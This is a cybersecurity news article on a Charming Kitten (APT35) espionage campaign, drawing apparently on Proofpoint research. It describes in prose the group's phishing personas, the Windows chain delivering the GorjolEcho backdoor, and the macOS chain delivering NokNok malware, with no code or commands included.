Iran

Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems.

The campaign started in May and relies on a different infection chain than previously observed, with LNK files deploying the payloads instead of the typical malicious Word documents seen in past attacks from the group.

Charming Kitten is also known as APT35 or Phosphorus and has launched at least 30 operations in 14 countries since 2015, according to according to Mandiant.

Google has linked the threat actor to the Iranian state, more specifically, the Islamic Revolutionary Guard Corps (IRGC).

In September 2022, the U.S. government managed to identify and charge members of the threat group.

Proofpoint reports that the threat actor has now abandoned the macro-based infection methods involving laced Word documents and instead deploys LNK files to load their payloads.

Regarding the phishing lures and social engineering methods seen in the campaign, the hackers posed as nuclear experts from the U.S. and approached targets with an offer to review drafts on foreign policy topics.

Email sampled from the latest Charming Kitten campaign
Email sampled from the latest Charming Kitten campaign (Proofpoint)

In many cases, the attackers insert other personas in the conversation to add a sense of legitimacy and establish a rapport with the target.

Second email from another fake persona
Second email from another fake persona (Proofpoint)

Charming Kitten’s impersonation or fake persona assumption in phishing attacks has been documented, and so has its use of ‘sock puppets’ to create realistic conversation threads.

Attacks on Windows

After gaining the target’s trust, Charming Kitten sends a malicious link that contains a Google Script macro, redirecting the victim to a Dropbox URL.

This external source hosts a password-protected RAR archive with a malware dropper that leverages PowerShell code and an LNK file to stage the malware from a cloud hosting provider.

The final payload is GorjolEcho, a simple backdoor that accepts and executes commands from its remote operators.

To avoid raising suspicion, GorjolEcho will open a PDF with a topic relevant to the discussion the attackers had with the target previously.

GorjolEcho infection chain
GorjolEcho infection chain (Proofpoint)

Attacks on macOS

If the victim uses macOS, which the hackers typically realize after they fail to infect them with the Windows payload, they send a new link to “library-store[.]camdvr[.]org” that hosts a ZIP file masquerading as a RUSI (Royal United Services Institute) VPN app.

Follow-up email sent to macOS users
Follow-up email sent to macOS users (Proofpoint)
Fake RUSI VPN site dropping the NokNok malware
Fake RUSI VPN site dropping the NokNok malware (Proofpoint)

When executing the Apple script file in the archive, a curl command fetches the NokNok payload and establishes a backdoor onto the victim’s system.

NokNok infection chain
NokNok infection chain (Proofpoint)

NokNok generates a system identifier and then uses four bash script modules to set persistence, establish communication with the command and control (C2) server, and then starts exfiltrating data to it.

NokNok modules
NokNok modules (Proofpoint)

The NokNok malware gathers system information that includes the version of  the OS, running processes, and installed applications.

NokNok encrypts all collected data, encodes it in the base64 format, and exfiltrates it.

Proofpoint also mentions that NokNok might feature more specific espionage-related functionality through other unseen modules.

The suspicion is based on code similarities to GhostEcho, previously analyzed by Check Point.

That backdoor featured modules that allowed taking screenshots, command execution, and cleaning the infection trail. It is likely that NokNok has these functions too.

Overall, this campaign shows that Charming Kitten has a high degree of adaptability, is capable of targeting macOS systems when necessary, and highlights the growing threat of sophisticated malware campaigns to macOS users.

Related Articles:

Chrome Enterprise gets Premium security but you have to pay for it

Visa warns of new JSOutProx malware variant targeting financial orgs

U.S. charges Iranian for hacks on defense orgs, offers $10M for info

CoralRaider attacks use CDN cache to push info-stealer malware

US govt sanctions Iranians linked to government cyberattacks